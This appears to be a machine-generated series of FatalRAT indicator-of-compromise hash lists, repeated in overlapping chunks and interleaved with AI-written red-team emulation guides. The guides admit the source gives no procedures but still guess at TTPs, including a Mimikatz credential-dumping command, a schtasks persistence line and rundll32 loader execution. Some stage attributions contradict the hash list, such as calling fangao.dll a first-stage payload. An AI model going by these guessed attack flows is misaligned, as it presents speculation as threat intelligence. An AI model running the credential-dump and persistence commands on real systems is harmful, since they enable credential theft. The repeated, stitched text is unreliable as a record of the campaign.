64d72e8d0539e6a0b74fb1c6e5127c05 – first stage loader 64fdeed776cfd5e260444ae2e4a5b1a4 – first stage loader 699ad2a5b6d9b9b59df79e9265ebd47a – first stage loader 6a5e3776c3bfdadd899704589f28e9fd – first stage loader 6a73f3bab8fb205ed46e57cf076b6f6d – first stage loader 7081b6781e66bdceb2b119a783b6c7fd – first stage loader 771a5d8fc6829618f15abe49796d1c44 – first stage loader 790cf080abb18af471d465998b37fd1b – first stage loader 797d111244805e897db5c21010ee8e12 – first stage loader 7ba376f5a71ffa21a92c7b35c3b000eb – first stage loader 82394a97458094b1cb22c4e243f4e9db – first stage loader 8c0599c0a6b7ffaff93762d0c3ea2569 – first stage loader 8da2c4796c439f4a57536bd5c5d3f811 – first stage loader 8e474f9321fc341770c9100853eb41eb – first stage loader 9037ccfcd3d3d1542089d30d3041db1c – first stage loader 936c16a64432348176f9183cd1524cef – first stage loader 93f12cbfb9ba1a66d3a050a74bab690b – first stage loader 949f086c40cfc5144243a24688961414 – first stage loader 9636309c41e8a33507c349b8e9053c49 – first stage loader 991cb5f8476edbc73223d1331704a9fd – first stage loader 9bb22b91b5ad59972130a3a428f7b5bb – first stage loader 9bf2e34511619b7c4573c3974bdbaa39 – first stage loader 9e8a08fcddb10db8d58e17b544d81bff – first stage loader a009b341aa6f5bda61300dc5e7822480 – first stage loader a7b20338dd9ed5462ddff312b67556e9 – first stage loader ab5f57681299933c1f70b938caa526d3 – first stage loader ac3fbdbfbc08f41e4ad1c004180093f1 – first stage loader ad216eaf11500eb73c6cdafc18cb49d8 – first stage loader ae735b1d9b7e9dd496d22409ceaeda66 – first stage loader b0c315c5dcda6e4442280c07b11d1ba5 – first stage loader b1ad89be2632933350683b91011a4aee – first stage loader b37917ea3849607d02d330130a823567 – first stage loader b3f8f1272813bff80630b9caab6e5089 – first stage loader b5c46f829fed11b4ddc2e155dc5cf974 – first stage loader bc36b1be438f92fe5f9a47f13244503e – first stage loader bd6b8574738c7589887b61d4fad68fce – first stage loader bdd68e7733c09fad48d4642689741ea4 – first stage loader be15a198f05eb39277720defa9188f62 – first stage loader c4579aa972d32e946752357ca56ee501 – first stage loader

It seems that the list provided includes hash values and a description indicating they are all "first stage loaders." Without additional details from the CTI report such as the actual procedures, command lines, or other techniques, I will need more context to give a structured emulation guide. If possible, please provide relevant details about how these loaders were used in the attack, such as command-line executions or specific techniques.

c555cc05f9d16b9e9222693e523e0ba5 – first stage loader c89a4a106619c67b8410efa695d78ef3 – first stage loader ca7dc49e80b2a77677718c72f3cc6bc1 – first stage loader cbc36deadef17a4c315cbbff3f74439f – first stage loader d35635e8d07b923d1e89f541d4f03b90 – first stage loader d413cf08ef7c6357dd0215b8b9ebe6f4 – first stage loader d494efc086447c543d0c3c7beecf2bc6 – first stage loader d6bda8be4ba9563844b3b9367b73bd2e – first stage loader dc2676b0c54b31a017ada4f62693de54 – first stage loader dded5d108b6a9ee50d629148d8ed4ec5 – first stage loader df6f5f4b7b8ba3c2c0ddc00d47e33218 – first stage loader e0d5b46dffee56c337fdc172ce617850 – first stage loader e32020ab02e11a995effb7781aabd92f – first stage loader e6ef56c91bd735542775dfef277e0cc7 – first stage loader e8204900e8acb502ca6e008f9532b35e – first stage loader e91991304abf5d881545bc127e7fb324 – first stage loader eb9419aa5c6fee96defad140450a9633 – first stage loader ec0bdf52c113487e803028dbc52e8173 – first stage loader ed036740be0a8e3203a54edd4d4b735c – first stage loader f9e461cc83076d5f597855165e89f0db – first stage loader fdc35392af34ef43291b8f7f959ef501 – first stage loader feb8e6059a234ea689404d3d4336e8af – first stage loader 4e40c9945cc8b62c123e5636155e96a7 – configurator (before.dll) 6bfe01cd9c038aa90bcd600d49657c21 – configurator (before.dll) 80c7667c14df5b92ab206b2ea9b42aff – configurator (before.dll) eb53df9fe23d469350885164aa82215e – configurator (before.dll) 32c105c5229843aaebf12621359195a9 – second stage loader (fangao.dll) 34b29454676e780d81d8bba066d7d94f – second stage loader (fangao.dll) 8577438ecff5753ddcf427b93c5976c8 – second stage loader (fangao.dll) f481a67933055956e8dd77b4b2bde9ed – second stage loader (fangao.dll) f8136c909fb35457fc963d87b50bc158 – third stage loader (wke.dll) 02477e031f776539c8118b8e0e6663b0 – FatalRAT final payload 02d8c59e5e8a85a81ee75ce517609739 – FatalRAT final payload 05c528a2b8bb20aad901c733d146d595 – FatalRAT final payload 15962f79997a308ab3072c10e573e97c – FatalRAT final payload 17278c3f4e8bf56d9c1054f67f19b82c – FatalRAT final payload 172ee543d8a083177fc1832257f6d57d – FatalRAT final payload 1fe3885dea6be2e1572d8c61e3910d19 – FatalRAT final payload 249f568f8b8709591e7afd934ebea299 – FatalRAT final payload

Phase: Initial Access

• Technique: Malicious Loader Deployment
• Procedure: Multiple first stage loaders were deployed. Likely executed by embedding in documents or user-triggered scripts.

Phase: Execution

• Technique: Code Execution via DLLs
• First Stage Loader Execution: Executed multiple loaders, likely used to prepare the environment for subsequent stages.
• Command Example: Execution of DLLs using rundll32.exe could be a likely command pattern, e.g., rundll32.exe loader.dll,EntryPoint

Phase: Configuration

• Technique: Configuration Management via DLL
• Executed Programs: before.dll used as a configurator.

Phase: Execution (Continued)

• Technique: Loading Additional Stages
• Second Stage Loader Execution: The fangao.dll serves as the second layer for payload deployment.
• Command Example: Could involve executing via rundll32.exe fangao.dll,EntryPoint

Phase: Final Payload Deployment

• Technique: RAT Deployment
• Final Payload: FatalRAT deployed as the ultimate stage.

Considerations for Emulation

• Use a series of DLL executions with varied entry points to simulate the loader execution framework.
• Utilize tools like rundll32.exe or other code execution utilities to test deployment strategies.
• Ensure execution flow mimics multiple loader stages to simulate layered attack deployment.

266bb19f9ceb1a4ccbf45577bbeaac1a – FatalRAT final payload 3c583e01eddd0ea6fe59a89aea4503b4 – FatalRAT final payload 3ec20285d88906336bd4119a74d977a0 – FatalRAT final payload 43156787489e6aa3a853346cded3e67b – FatalRAT final payload 46630065be23c229adff5e0ae5ca1f48 – FatalRAT final payload 577e1a301e91440b920f24e7f6603d45 – FatalRAT final payload 5be46b50cac057500ea3424be69bf73a – FatalRAT final payload 60a92d76e96aaa0ec79b5081ddcc8a24 – FatalRAT final payload 60dbc3ef17a50ea7726bdb94e96a1614 – FatalRAT final payload 635f3617050e4c442f2cbd7f147c4dcf – FatalRAT final payload 675a113cdbcce171e1ff172834b5f740 – FatalRAT final payload 68a27f7ccbfa7d3b958fad078d37e299 – FatalRAT final payload 73e49ddf4251924c66e3445a06250b10 – FatalRAT final payload 787f2819d905d3fe684460143e01825c – FatalRAT final payload 7ac3ebac032c4afd09e18709d19358ed – FatalRAT final payload 8f67a7220d36d5c233fc70d6ecf1ee33 – FatalRAT final payload 9b4d46177f24ca0a4881f0c7c83f5ef8 – FatalRAT final payload 9c3f469a5b54fb2ec29ac7831780ed6d – FatalRAT final payload 9d34d83e4671aaf23ff3e61cb9daa115 – FatalRAT final payload a935ef1151d45c7860bfe799424bea4b – FatalRAT final payload bcec6b78adb3cf966fab9025dacb0f05 – FatalRAT final payload d0d3efcff97ef59fe269c6ed5ebb06c9 – FatalRAT final payload ebc0809580940e384207aa1704e5cc8e – FatalRAT final payload eca08239da3acaf0d389886a9b91612a – FatalRAT final payload ed6837f0e351aff09db3c8ee93fbcf06 – FatalRAT final payload fb8dc76a0cb0a5d32e787a1bb21f92d2 – FatalRAT final payload feb49021233524bd64eb6ce37359c425 – FatalRAT final payload 02fb1958a901d7d1c8b60ecc0e59207c – first stage loader 033a8d6ec5a738a1a90dd4a86c7259c8 – first stage loader 04aa425d86f4ef8dc4fc1509b195838a – first stage loader 096c34df242562d278fc1578dc31df92 – first stage loader 09a50edb49cbb59a34828a37e63be846 – first stage loader 0a49345c77da210ab0cd031fda6bc962 – first stage loader 0a70ea6596c92fbfb461909ed57503fa – first stage loader 0b20f0ff1aaff4068f99f4db69ba9c1e – first stage loader 0c33792c6ed37452f44ca94ce7385250 – first stage loader 142eb5106fcc2f95b7daf37dca970595 – first stage loader 15b7990bd006d857ee02c529b45783ac – first stage loader 1c79abe9f52cbe92f042615a9f6b6f10 – first stage loader 1e80a8b3f4efb4bb27771d729f5ced85 – first stage loader 2026ead0c2366d049ecd5e42ac1b1b07 – first stage loader 24ecb197ee73e5b1eef2ded592640cf2 – first stage loader 26f0806932dfd029f0fe12e49bb4c799 – first stage loader 28231ce260ce66388d58ce536d7ed201 – first stage loader 2aa41ae3d3ae789147218652e6593161 – first stage loader 2bccd50322afb7a349c163ce9b76bb66 – first stage loader 357534f6a2bffa77b83501715e382a94 – first stage loader 362fc5799ecef8e9e328cfbf6272c48f – first stage loader 3843ef98a4c7ee88f10078e6a38f15ee – first stage loader 3883957530482a399abb5e1f06e4581f – first stage loader 3b32fc9115c224653f5afba793c0bbef – first stage loader 3ca82fd8d12967c32388ad18e9727fac – first stage loader 44b47fdab8ca3375fe5a875deefa265c – first stage loader 4fc6dbb9beeecb2d60f3fef356c6df01 – first stage loader 502054d938a18172a3657aaf2326bcf4 – first stage loader 50a5c5a3c07f04d96f5f1968996cfb74 – first stage loader 50d29ee29b54685bd10b8d2917696413 – first stage loader 58a8daae643a84c112ddc6e79c750271 – first stage loader 58e44c4d797cecfed42c1fdf18c2d5f9 – first stage loader 58fe500e022ea1aeebbe72c4ce694531 – first stage loader 5b730131c3271820c03d711f2549b894 – first stage loader

I'm unable to identify specific CTI report procedures just from the hashes and labels provided. To help you accurately emulate the attack, please provide specific details or descriptions from the report regarding the tools, command lines, or techniques used by the threat actors. If available, the following format could be used to illustrate the phases and actions:

Phase: Initial Access

• Technique: (Description of how initial access is achieved)
• Procedure: (Details on the method, such as phishing, exploiting a vulnerability, etc.)

Phase: Execution

• Technique: (Description of execution technique)
• Command: (Specific command if available)

Phase: Persistence

• Technique: (Description of persistence method)
• Command: (Specific command if available)

Phase: Lateral Movement

• Technique: (Description of lateral movement technique)
• Command: (Specific command if available)

Phase: Credential Dumping

• Technique: (Description of credential dumping method)
• Command: (Specific command if available)

If you have such information from the report, please share it for a more comprehensive analysis.

5c1de870ea1e08b25e7ce4397372f5a6 – first stage loader 5d7fba23a44683c0b471d9a7cc7f5042 – first stage loader 632c0808e4d0c7b293642e4c4ae8e2a2 – first stage loader 63562347202715eff0e7f2d6ad07a2aa – first stage loader 63c600434def54157204765619838372 – first stage loader 64013e613a0130cb1b7845139537bc5e – first stage loader 64d72e8d0539e6a0b74fb1c6e5127c05 – first stage loader 64fdeed776cfd5e260444ae2e4a5b1a4 – first stage loader 699ad2a5b6d9b9b59df79e9265ebd47a – first stage loader 6a5e3776c3bfdadd899704589f28e9fd – first stage loader 6a73f3bab8fb205ed46e57cf076b6f6d – first stage loader 7081b6781e66bdceb2b119a783b6c7fd – first stage loader 771a5d8fc6829618f15abe49796d1c44 – first stage loader 790cf080abb18af471d465998b37fd1b – first stage loader 797d111244805e897db5c21010ee8e12 – first stage loader 7ba376f5a71ffa21a92c7b35c3b000eb – first stage loader 82394a97458094b1cb22c4e243f4e9db – first stage loader 8c0599c0a6b7ffaff93762d0c3ea2569 – first stage loader 8da2c4796c439f4a57536bd5c5d3f811 – first stage loader 8e474f9321fc341770c9100853eb41eb – first stage loader 9037ccfcd3d3d1542089d30d3041db1c – first stage loader 936c16a64432348176f9183cd1524cef – first stage loader 93f12cbfb9ba1a66d3a050a74bab690b – first stage loader 949f086c40cfc5144243a24688961414 – first stage loader 9636309c41e8a33507c349b8e9053c49 – first stage loader 991cb5f8476edbc73223d1331704a9fd – first stage loader 9bb22b91b5ad59972130a3a428f7b5bb – first stage loader 9bf2e34511619b7c4573c3974bdbaa39 – first stage loader 9e8a08fcddb10db8d58e17b544d81bff – first stage loader a009b341aa6f5bda61300dc5e7822480 – first stage loader a7b20338dd9ed5462ddff312b67556e9 – first stage loader ab5f57681299933c1f70b938caa526d3 – first stage loader ac3fbdbfbc08f41e4ad1c004180093f1 – first stage loader ad216eaf11500eb73c6cdafc18cb49d8 – first stage loader ae735b1d9b7e9dd496d22409ceaeda66 – first stage loader b0c315c5dcda6e4442280c07b11d1ba5 – first stage loader b1ad89be2632933350683b91011a4aee – first stage loader b37917ea3849607d02d330130a823567 – first stage loader b3f8f1272813bff80630b9caab6e5089 – first stage loader b5c46f829fed11b4ddc2e155dc5cf974 – first stage loader bc36b1be438f92fe5f9a47f13244503e – first stage loader bd6b8574738c7589887b61d4fad68fce – first stage loader bdd68e7733c09fad48d4642689741ea4 – first stage loader be15a198f05eb39277720defa9188f62 – first stage loader c4579aa972d32e946752357ca56ee501 – first stage loader c555cc05f9d16b9e9222693e523e0ba5 – first stage loader c89a4a106619c67b8410efa695d78ef3 – first stage loader ca7dc49e80b2a77677718c72f3cc6bc1 – first stage loader cbc36deadef17a4c315cbbff3f74439f – first stage loader d35635e8d07b923d1e89f541d4f03b90 – first stage loader d413cf08ef7c6357dd0215b8b9ebe6f4 – first stage loader d494efc086447c543d0c3c7beecf2bc6 – first stage loader d6bda8be4ba9563844b3b9367b73bd2e – first stage loader dc2676b0c54b31a017ada4f62693de54 – first stage loader dded5d108b6a9ee50d629148d8ed4ec5 – first stage loader df6f5f4b7b8ba3c2c0ddc00d47e33218 – first stage loader e0d5b46dffee56c337fdc172ce617850 – first stage loader e32020ab02e11a995effb7781aabd92f – first stage loader e6ef56c91bd735542775dfef277e0cc7 – first stage loader e8204900e8acb502ca6e008f9532b35e – first stage loader e91991304abf5d881545bc127e7fb324 – first stage loader eb9419aa5c6fee96defad140450a9633 – first stage loader ec0bdf52c113487e803028dbc52e8173 – first stage loader ed036740be0a8e3203a54edd4d4b735c – first stage loader f9e461cc83076d5f597855165e89f0db – first stage loader fdc35392af34ef43291b8f7f959ef501 – first stage loader feb8e6059a234ea689404d3d4336e8af – first stage loader 4e40c9945cc8b62c123e5636155e96a7 – configurator (before.dll) 6bfe01cd9c038aa90bcd600d49657c21 – configurator (before.dll) 80c7667c14df5b92ab206b2ea9b42aff – configurator (before.dll) eb53df9fe23d469350885164aa82215e – configurator (before.dll) 32c105c5229843aaebf12621359195a9 – second stage loader (fangao.dll) 34b29454676e780d81d8bba066d7d94f – second stage loader (fangao.dll) 8577438ecff5753ddcf427b93c5976c8 – second stage loader (fangao.dll) f481a67933055956e8dd77b4b2bde9ed – second stage loader (fangao.dll) f8136c909fb35457fc963d87b50bc158 – third stage loader (wke.dll) 02477e031f776539c8118b8e0e6663b0 – FatalRAT final payload 02d8c59e5e8a85a81ee75ce517609739 – FatalRAT final payload 05c528a2b8bb20aad901c733d146d595 – FatalRAT final payload 15962f79997a308ab3072c10e573e97c – FatalRAT final payload 17278c3f4e8bf56d9c1054f67f19b82c – FatalRAT final payload 172ee543d8a083177fc1832257f6d57d – FatalRAT final payload 1fe3885dea6be2e1572d8c61e3910d19 – FatalRAT final payload 249f568f8b8709591e7afd934ebea299 – FatalRAT final payload 266bb19f9ceb1a4ccbf45577bbeaac1a – FatalRAT final payload 3c583e01eddd0ea6fe59a89aea4503b4 – FatalRAT final payload 3ec20285d88906336bd4119a74d977a0 – FatalRAT final payload 43156787489e6aa3a853346cded3e67b – FatalRAT final payload 46630065be23c229adff5e0ae5ca1f48 – FatalRAT final payload 577e1a301e91440b920f24e7f6603d45 – FatalRAT final payload 5be46b50cac057500ea3424be69bf73a – FatalRAT final payload 60a92d76e96aaa0ec79b5081ddcc8a24 – FatalRAT final payload 60dbc3ef17a50ea7726bdb94e96a1614 – FatalRAT final payload 635f3617050e4c442f2cbd7f147c4dcf – FatalRAT final payload 675a113cdbcce171e1ff172834b5f740 – FatalRAT final payload 68a27f7ccbfa7d3b958fad078d37e299 – FatalRAT final payload 73e49ddf4251924c66e3445a06250b10 – FatalRAT final payload 787f2819d905d3fe684460143e01825c – FatalRAT final payload 7ac3ebac032c4afd09e18709d19358ed – FatalRAT final payload 8f67a7220d36d5c233fc70d6ecf1ee33 – FatalRAT final payload 9b4d46177f24ca0a4881f0c7c83f5ef8 – FatalRAT final payload 9c3f469a5b54fb2ec29ac7831780ed6d – FatalRAT final payload 9d34d83e4671aaf23ff3e61cb9daa115 – FatalRAT final payload a935ef1151d45c7860bfe799424bea4b – FatalRAT final payload bcec6b78adb3cf966fab9025dacb0f05 – FatalRAT final payload d0d3efcff97ef59fe269c6ed5ebb06c9 – FatalRAT final payload ebc0809580940e384207aa1704e5cc8e – FatalRAT final payload

Phase: Initial Access

• Technique: Phishing via Malicious Document
• Procedure: The attacker likely uses a phishing email to deliver a malicious document that initiates the download of the first stage loader executables listed.

Phase: Execution

• Technique: DLL Sideloading
• Procedure: The execution begins with the deployment of first-stage loaders that could use DLL sideloading techniques.

Phase: Persistence

• Technique: Configurator Deployment
• Procedure: Deploys configurators before.dll to maintain persistence and configure the environment for further exploitation.

Phase: Execution

• Technique: Second Stage Malware Loading
• Procedure: Executes the second stage loader (fangao.dll) to load and run additional malicious code.

Phase: Execution

• Technique: Third Stage Execution
• Procedure: Loads the third stage loader (wke.dll) for advanced operations.

Phase: Impact

• Technique: RAT Deployment
• Procedure: Executes the FatalRAT payload as the final stage, granting full remote access and control over the compromised system.

Note to Red Teams: The specific command line used for executing DLLs and various payload stages was not provided but could involve traditional DLL sideloading and execution commands, such as rundll32.exe for DLL execution. It's recommended to test these methodologies in a controlled environment to simulate the multi-stage loading and execution flow.

eca08239da3acaf0d389886a9b91612a – FatalRAT final payload ed6837f0e351aff09db3c8ee93fbcf06 – FatalRAT final payload fb8dc76a0cb0a5d32e787a1bb21f92d2 – FatalRAT final payload feb49021233524bd64eb6ce37359c425 – FatalRAT final payload 02fb1958a901d7d1c8b60ecc0e59207c – first stage loader 033a8d6ec5a738a1a90dd4a86c7259c8 – first stage loader 04aa425d86f4ef8dc4fc1509b195838a – first stage loader 096c34df242562d278fc1578dc31df92 – first stage loader 09a50edb49cbb59a34828a37e63be846 – first stage loader 0a49345c77da210ab0cd031fda6bc962 – first stage loader 0a70ea6596c92fbfb461909ed57503fa – first stage loader 0b20f0ff1aaff4068f99f4db69ba9c1e – first stage loader 0c33792c6ed37452f44ca94ce7385250 – first stage loader 142eb5106fcc2f95b7daf37dca970595 – first stage loader 15b7990bd006d857ee02c529b45783ac – first stage loader 1c79abe9f52cbe92f042615a9f6b6f10 – first stage loader 1e80a8b3f4efb4bb27771d729f5ced85 – first stage loader 2026ead0c2366d049ecd5e42ac1b1b07 – first stage loader 24ecb197ee73e5b1eef2ded592640cf2 – first stage loader 26f0806932dfd029f0fe12e49bb4c799 – first stage loader 28231ce260ce66388d58ce536d7ed201 – first stage loader 2aa41ae3d3ae789147218652e6593161 – first stage loader 2bccd50322afb7a349c163ce9b76bb66 – first stage loader 357534f6a2bffa77b83501715e382a94 – first stage loader 362fc5799ecef8e9e328cfbf6272c48f – first stage loader 3843ef98a4c7ee88f10078e6a38f15ee – first stage loader 3883957530482a399abb5e1f06e4581f – first stage loader 3b32fc9115c224653f5afba793c0bbef – first stage loader 3ca82fd8d12967c32388ad18e9727fac – first stage loader 44b47fdab8ca3375fe5a875deefa265c – first stage loader 4fc6dbb9beeecb2d60f3fef356c6df01 – first stage loader 502054d938a18172a3657aaf2326bcf4 – first stage loader 50a5c5a3c07f04d96f5f1968996cfb74 – first stage loader 50d29ee29b54685bd10b8d2917696413 – first stage loader 58a8daae643a84c112ddc6e79c750271 – first stage loader 58e44c4d797cecfed42c1fdf18c2d5f9 – first stage loader 58fe500e022ea1aeebbe72c4ce694531 – first stage loader 5b730131c3271820c03d711f2549b894 – first stage loader 5c1de870ea1e08b25e7ce4397372f5a6 – first stage loader 5d7fba23a44683c0b471d9a7cc7f5042 – first stage loader 632c0808e4d0c7b293642e4c4ae8e2a2 – first stage loader 63562347202715eff0e7f2d6ad07a2aa – first stage loader 63c600434def54157204765619838372 – first stage loader 64013e613a0130cb1b7845139537bc5e – first stage loader 64d72e8d0539e6a0b74fb1c6e5127c05 – first stage loader 64fdeed776cfd5e260444ae2e4a5b1a4 – first stage loader 699ad2a5b6d9b9b59df79e9265ebd47a – first stage loader 6a5e3776c3bfdadd899704589f28e9fd – first stage loader 6a73f3bab8fb205ed46e57cf076b6f6d – first stage loader 7081b6781e66bdceb2b119a783b6c7fd – first stage loader 771a5d8fc6829618f15abe49796d1c44 – first stage loader 790cf080abb18af471d465998b37fd1b – first stage loader 797d111244805e897db5c21010ee8e12 – first stage loader 7ba376f5a71ffa21a92c7b35c3b000eb – first stage loader 82394a97458094b1cb22c4e243f4e9db – first stage loader 8c0599c0a6b7ffaff93762d0c3ea2569 – first stage loader

The provided report lists file hashes associated with the FatalRAT payload and its first-stage loader, but lacks detailed command-line executions or specific attack techniques. Based on what is typically involved in such operations, here is an inferred set of TTPs:

Phase: Initial Access

• Technique: Spear Phishing with Malicious Attachments
• Procedure: Likely involved sending spear-phishing emails containing attachments or links to download the first-stage loader.

Phase: Execution

• Technique: Execution of First-Stage Loader
• Procedure: The first-stage loader executes on the victim's machine, potentially using a command like:
• Command Example: loader.exe

Phase: Persistence

• Technique: Scheduled Task
• Procedure: Use a scheduled task to maintain persistence.
• Command Example: schtasks /create /tn "Updater" /tr "C:\Path\to\FatalRAT.exe" /sc daily /st 12:00

Phase: Lateral Movement

• Technique: Remote Service Execution
• Procedure: Use of remote service execution tools or techniques to move laterally across the network, possibly involving PsExec or similar.

Phase: Command and Control

• Technique: Use of RAT for C2 Communication
• Procedure: FatalRAT likely establishes a connection to a C2 server to receive commands and exfiltrate data.

Phase: Credential Dumping

• Technique: Memory Credential Access
• Procedure: Use tools like Mimikatz to extract credentials from memory.
• Command Example: mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Phase: Impact

• Technique: Data Encryption or Exfiltration
• Procedure: Encrypt files or exfiltrate sensitive information using the RAT capabilities.

This structured approach is based on typical attack flows associated with RAT operations and first-stage loaders. However, for red team emulation, more detailed investigation and specific commands from live samples would be necessary.

8da2c4796c439f4a57536bd5c5d3f811 – first stage loader 8e474f9321fc341770c9100853eb41eb – first stage loader 9037ccfcd3d3d1542089d30d3041db1c – first stage loader 936c16a64432348176f9183cd1524cef – first stage loader 93f12cbfb9ba1a66d3a050a74bab690b – first stage loader 949f086c40cfc5144243a24688961414 – first stage loader 9636309c41e8a33507c349b8e9053c49 – first stage loader 991cb5f8476edbc73223d1331704a9fd – first stage loader 9bb22b91b5ad59972130a3a428f7b5bb – first stage loader 9bf2e34511619b7c4573c3974bdbaa39 – first stage loader 9e8a08fcddb10db8d58e17b544d81bff – first stage loader a009b341aa6f5bda61300dc5e7822480 – first stage loader a7b20338dd9ed5462ddff312b67556e9 – first stage loader ab5f57681299933c1f70b938caa526d3 – first stage loader ac3fbdbfbc08f41e4ad1c004180093f1 – first stage loader ad216eaf11500eb73c6cdafc18cb49d8 – first stage loader ae735b1d9b7e9dd496d22409ceaeda66 – first stage loader b0c315c5dcda6e4442280c07b11d1ba5 – first stage loader b1ad89be2632933350683b91011a4aee – first stage loader b37917ea3849607d02d330130a823567 – first stage loader b3f8f1272813bff80630b9caab6e5089 – first stage loader b5c46f829fed11b4ddc2e155dc5cf974 – first stage loader bc36b1be438f92fe5f9a47f13244503e – first stage loader bd6b8574738c7589887b61d4fad68fce – first stage loader bdd68e7733c09fad48d4642689741ea4 – first stage loader be15a198f05eb39277720defa9188f62 – first stage loader c4579aa972d32e946752357ca56ee501 – first stage loader c555cc05f9d16b9e9222693e523e0ba5 – first stage loader c89a4a106619c67b8410efa695d78ef3 – first stage loader ca7dc49e80b2a77677718c72f3cc6bc1 – first stage loader cbc36deadef17a4c315cbbff3f74439f – first stage loader d35635e8d07b923d1e89f541d4f03b90 – first stage loader d413cf08ef7c6357dd0215b8b9ebe6f4 – first stage loader d494efc086447c543d0c3c7beecf2bc6 – first stage loader d6bda8be4ba9563844b3b9367b73bd2e – first stage loader dc2676b0c54b31a017ada4f62693de54 – first stage loader dded5d108b6a9ee50d629148d8ed4ec5 – first stage loader df6f5f4b7b8ba3c2c0ddc00d47e33218 – first stage loader e0d5b46dffee56c337fdc172ce617850 – first stage loader e32020ab02e11a995effb7781aabd92f – first stage loader e6ef56c91bd735542775dfef277e0cc7 – first stage loader e8204900e8acb502ca6e008f9532b35e – first stage loader e91991304abf5d881545bc127e7fb324 – first stage loader eb9419aa5c6fee96defad140450a9633 – first stage loader ec0bdf52c113487e803028dbc52e8173 – first stage loader ed036740be0a8e3203a54edd4d4b735c – first stage loader f9e461cc83076d5f597855165e89f0db – first stage loader fdc35392af34ef43291b8f7f959ef501 – first stage loader feb8e6059a234ea689404d3d4336e8af – first stage loader 4e40c9945cc8b62c123e5636155e96a7 – configurator (before.dll) 6bfe01cd9c038aa90bcd600d49657c21 – configurator (before.dll) 80c7667c14df5b92ab206b2ea9b42aff – configurator (before.dll) eb53df9fe23d469350885164aa82215e – configurator (before.dll) 32c105c5229843aaebf12621359195a9 – second stage loader (fangao.dll)

The provided data is a list of file identifiers and their descriptions. It doesn't include specific command lines or explicit procedural details, but based on known attack methodologies, I can infer potential procedures:

Phase: Initial Access

• Technique: Malicious File Execution
• Procedure: The attacker uses first-stage loaders, likely delivered through phishing or exploit, to gain an initial foothold.

Phase: Execution

• Technique: DLL Sideloading
• Procedure: Utilize before.dll as a configurator to further execute commands or deploy payloads.

Phase: Persistence

• Technique: DLL Execution
• Command: Load fangao.dll as a second-stage loader to maintain persistence or escalate privileges within the infected system.

Phase: Command and Control

• Technique: Malware Loader Communication
• Procedure: Loaders communicate with command and control servers to retrieve additional payloads or receive commands.

These methods are speculative and based on typical uses of loaders and DLL files in malware campaigns. For a more accurate red team emulation, specific command-line usage and behavioral analysis of the samples would be required.

34b29454676e780d81d8bba066d7d94f – second stage loader (fangao.dll) 8577438ecff5753ddcf427b93c5976c8 – second stage loader (fangao.dll) f481a67933055956e8dd77b4b2bde9ed – second stage loader (fangao.dll) f8136c909fb35457fc963d87b50bc158 – third stage loader (wke.dll) 02477e031f776539c8118b8e0e6663b0 – FatalRAT final payload 02d8c59e5e8a85a81ee75ce517609739 – FatalRAT final payload 05c528a2b8bb20aad901c733d146d595 – FatalRAT final payload 15962f79997a308ab3072c10e573e97c – FatalRAT final payload 17278c3f4e8bf56d9c1054f67f19b82c – FatalRAT final payload 172ee543d8a083177fc1832257f6d57d – FatalRAT final payload 1fe3885dea6be2e1572d8c61e3910d19 – FatalRAT final payload 249f568f8b8709591e7afd934ebea299 – FatalRAT final payload 266bb19f9ceb1a4ccbf45577bbeaac1a – FatalRAT final payload 3c583e01eddd0ea6fe59a89aea4503b4 – FatalRAT final payload 3ec20285d88906336bd4119a74d977a0 – FatalRAT final payload 43156787489e6aa3a853346cded3e67b – FatalRAT final payload 46630065be23c229adff5e0ae5ca1f48 – FatalRAT final payload 577e1a301e91440b920f24e7f6603d45 – FatalRAT final payload 5be46b50cac057500ea3424be69bf73a – FatalRAT final payload 60a92d76e96aaa0ec79b5081ddcc8a24 – FatalRAT final payload 60dbc3ef17a50ea7726bdb94e96a1614 – FatalRAT final payload 635f3617050e4c442f2cbd7f147c4dcf – FatalRAT final payload 675a113cdbcce171e1ff172834b5f740 – FatalRAT final payload 68a27f7ccbfa7d3b958fad078d37e299 – FatalRAT final payload 73e49ddf4251924c66e3445a06250b10 – FatalRAT final payload 787f2819d905d3fe684460143e01825c – FatalRAT final payload 7ac3ebac032c4afd09e18709d19358ed – FatalRAT final payload 8f67a7220d36d5c233fc70d6ecf1ee33 – FatalRAT final payload 9b4d46177f24ca0a4881f0c7c83f5ef8 – FatalRAT final payload 9c3f469a5b54fb2ec29ac7831780ed6d – FatalRAT final payload 9d34d83e4671aaf23ff3e61cb9daa115 – FatalRAT final payload a935ef1151d45c7860bfe799424bea4b – FatalRAT final payload bcec6b78adb3cf966fab9025dacb0f05 – FatalRAT final payload d0d3efcff97ef59fe269c6ed5ebb06c9 – FatalRAT final payload ebc0809580940e384207aa1704e5cc8e – FatalRAT final payload eca08239da3acaf0d389886a9b91612a – FatalRAT final payload ed6837f0e351aff09db3c8ee93fbcf06 – FatalRAT final payload fb8dc76a0cb0a5d32e787a1bb21f92d2 – FatalRAT final payload feb49021233524bd64eb6ce37359c425 – FatalRAT final payload Security solutions verdicts Backdoor.Win32.Agent.myuolz Backdoor.Win32.Agent.myuomc Backdoor.Win32.Agent.myuomd Backdoor.Win32.Agent.myuomf Backdoor.Win32.Agent.myuomi Backdoor.Win32.Agent.myuoqw Backdoor.Win32.Agent.myuorl Backdoor.Win32.Agent.myuorw Backdoor.Win32.Agent.myuosj Backdoor.Win32.Agent.myuosk

Based on the provided information, actionable procedures are not explicitly described. However, I can infer a possible attack flow based on typical behaviors associated with the mentioned malware stages and RAT (Remote Access Trojan) usage:

Phase: Initial Access

• Technique: Malicious File Delivery
• Procedure: The attacker likely sent files (fangao.dll, wke.dll) as first-stage payloads to initiate the infection.

Phase: Execution

• Technique: DLL Side-Loading
• Procedure: The fangao.dll is used as a loader, possibly executed using a legitimate application to evade detection.

Phase: Persistence

• Technique: RAT Deployment for Continued Access
• Procedure: Deployment of FatalRAT as a final payload to ensure persistent access to the system.

Phase: Command and Control (C2)

• Technique: Remote Access via RAT
• Procedure: FatalRAT is used to establish communication with the attacker for remote command execution.

Phase: Impact

• Technique: Backdoor Capabilities
• Procedure: Execution of backdoor functionalities described by security verdicts such as Backdoor.Win32.Agent variants, enabling data exfiltration and potential further exploitation.

For a more detailed emulation, consider mapping these procedures with known techniques from frameworks like MITRE ATT&CK and adapt them based on specific capabilities of fangao.dll, wke.dll, and FatalRAT.

